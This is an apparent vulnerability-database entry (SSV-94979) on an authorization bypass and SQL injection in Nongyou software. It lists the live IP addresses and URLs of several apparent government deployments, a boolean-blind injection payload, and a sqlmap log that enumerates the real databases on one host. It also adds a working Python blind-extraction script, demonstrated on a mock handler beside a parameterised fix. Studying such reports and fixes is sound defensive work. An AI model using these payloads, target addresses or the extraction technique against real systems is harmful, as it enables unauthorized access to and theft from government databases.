A government system: one authorization bypass + one SQL injection

Basic fields

Vulnerability ID:
SSV-94979
Disclosure/discovery date:
2015-01-06
Submission date:
2015-01-06
Severity:
Vulnerability category:
Other
Affected component:
Nongyou
Author:
路人甲
Submitter:
Knownsec
CVE-ID:
(none listed)
CNNVD-ID:
(none listed)
CNVD-ID:
(none listed)
ZoomEye Dork:
(none listed)

Source

Vulnerability details


Brief description:

As titled (RT).

Detailed description:

Vendor: Shandong Nongyou Software (山东农友软件公司), official site http://www.nongyou.com.cn/

1. Authorization bypass. The /jubao/left.aspx page on the following deployed instances can be opened directly, without proper authorization:
http://221.2.149.47:8100/jubao/left.aspx
http://222.135.109.70:8100/jubao/left.aspx
http://123.134.189.60:8012/jubao/left.aspx
http://218.56.40.229:8020/jubao/left.aspx
http://222.135.127.190:7000/jubao/left.aspx

[Screenshot: 1.png]

2. SQL injection (reachable through the same bypass) in the pid parameter of StatisticalAnalysisChart.aspx:
http://222.135.127.190:7000/jubao/StatisticalAnalysisChart.aspx?pid=
http://221.2.149.47:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://222.135.109.70:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=
http://218.56.40.229:8020/jubao/StatisticalAnalysisChart.aspx?pid=

Tested injection point: http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=

[Screenshot: 2.png]

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz
---
[18:13:11] [INFO] testing MySQL
[18:13:11] [WARNING] the back-end DBMS is not MySQL
[18:13:11] [INFO] testing Oracle
sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you want to follow? [Y/n] n
[18:13:12] [WARNING] the back-end DBMS is not Oracle
[18:13:12] [INFO] testing PostgreSQL
[18:13:12] [WARNING] the back-end DBMS is not PostgreSQL
[18:13:12] [INFO] testing Microsoft SQL Server
[18:13:12] [WARNING] reflective value(s) found and filtering out
[18:13:12] [INFO] confirming Microsoft SQL Server
[18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:13:13] [INFO] fetching database names
[18:13:13] [INFO] fetching number of databases
[18:13:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:13:13] [INFO] retrieved: 12
[18:13:14] [INFO] retrieved: gangchengnl
[18:13:22] [INFO] retrieved: gaoxinqunl
[18:13:31] [INFO] retrieved: kaifaqunl
[18:13:41] [INFO] retrieved: laichengnl
[18:13:51] [INFO] retrieved: laiwunl
[18:13:58] [INFO] retrieved: master
[18:14:03] [INFO] retrieved: model
[18:14:08] [INFO] retrieved: msdb
[18:14:11] [INFO] retrieved: ReportServer
[18:14:21] [INFO] retrieved: ReportServerTempDB
[18:14:36] [INFO] retrieved: tempdb
[18:14:41] [INFO] retrieved: xueyenl
available databases [12]:
[*] gangchengnl
[*] gaoxinqunl
[*] kaifaqunl
[*] laichengnl
[*] laiwunl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xueyenl
[18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\123.134.189.60'

Reproducible on all of the listed hosts.
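The boolean-based blind technique behind the sqlmap output above, as an added example that is not part of the original report or of Nongyou's code. It mocks the injectable handler with SQLite standing in for MSSQL (the report table, the app_user table and the admin password are constructed for the demo), uses a baseline pid of 1 where the original run had an empty value, reuses the trailing AND 'QMWz'='QMWz clause from the page's payload, and places a parameterised handler beside the vulnerable one so the same oracle can be shown failing against it:

```python
import sqlite3

# Constructed stand-in for the MSSQL back end behind /jubao/StatisticalAnalysisChart.aspx.
# Tables, rows and the secret are invented for this demo; SQLite replaces MSSQL.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE report(id TEXT PRIMARY KEY, title TEXT);
        INSERT INTO report VALUES ('1', 'Q1 complaints');
        INSERT INTO report VALUES ('2', 'Q2 complaints');
        CREATE TABLE app_user(name TEXT, pwd TEXT);
        INSERT INTO app_user VALUES ('admin', 'S3cret!');
    """)
    return conn

CONN = build_db()

def chart_vulnerable(pid: str) -> str:
    """Mock of the injectable handler: pid is concatenated into the WHERE clause."""
    sql = "SELECT title FROM report WHERE id = '" + pid + "'"
    try:
        row = CONN.execute(sql).fetchone()
    except sqlite3.Error:
        # Unhandled DB errors become a redirect to /ErrorPage.htm, as sqlmap observed.
        return "302 ErrorPage.htm"
    return row[0] if row else "no data"

def chart_fixed(pid: str) -> str:
    """Hardened handler: pid is bound as a parameter, never spliced into the SQL text."""
    row = CONN.execute("SELECT title FROM report WHERE id = ?", (pid,)).fetchone()
    return row[0] if row else "no data"

BASE = "1"                      # a pid that renders a chart (the original run used "")
SUFFIX = " AND 'QMWz'='QMWz"    # trailing clause taken from the page's sqlmap payload

def oracle(handler, condition: str) -> bool:
    """True iff injecting `condition` leaves the response identical to the baseline."""
    return handler(f"{BASE}' AND ({condition}){SUFFIX}") == handler(BASE)

def is_injectable(handler) -> bool:
    """sqlmap's boolean-based check: a true clause keeps the page, a false one changes it."""
    return oracle(handler, "5349=5349") and not oracle(handler, "5349=5350")

def extract_string(handler, subquery: str, max_len: int = 32) -> str:
    """Recover a scalar subquery result one character at a time by binary search on
    its code point; this is what produces sqlmap's 'retrieved: ...' lines.
    SQLite syntax here; on MSSQL the equivalents are LEN() and ASCII(SUBSTRING())."""
    out = []
    for pos in range(1, max_len + 1):
        if not oracle(handler, f"length(({subquery})) >= {pos}"):
            break                       # no character at this position: string ended
        lo, hi = 0, 127                 # ASCII range is enough for this demo
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(handler, f"unicode(substr(({subquery}), {pos}, 1)) >= {mid}"):
                lo = mid
            else:
                hi = mid - 1
        out.append(chr(lo))
    return "".join(out)

# Schema enumeration (the SQLite analogue of sqlmap's --dbs) and a data read.
FIRST_TABLE = "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1"
ADMIN_PWD = "SELECT pwd FROM app_user WHERE name='admin'"

if __name__ == "__main__":
    for name, handler in (("vulnerable", chart_vulnerable), ("fixed", chart_fixed)):
        print(f"[{name}] injectable: {is_injectable(handler)}")
        print(f"[{name}] first table: {extract_string(handler, FIRST_TABLE)!r}")
        print(f"[{name}] admin pwd:   {extract_string(handler, ADMIN_PWD)!r}")
```

Against the vulnerable handler the oracle distinguishes true from false conditions and recovers the table name and the password with about seven requests per character; against the parameterised handler every injected string is just an id that matches nothing, so the check reports not injectable and extraction returns an empty string. The ErrorPage.htm redirect seen in the sqlmap log corresponds to the error branch of the vulnerable handler, which is why a broken payload such as an out-of-range ORDER BY changes the response.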

Proof of vulnerability: the sqlmap run against http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= shown in the detailed description above (screenshots 2.png and 1.png).



PoC

No PoC available

References

Solutions

Temporary solution

None available

Official solution

None available

Protection measures

None available

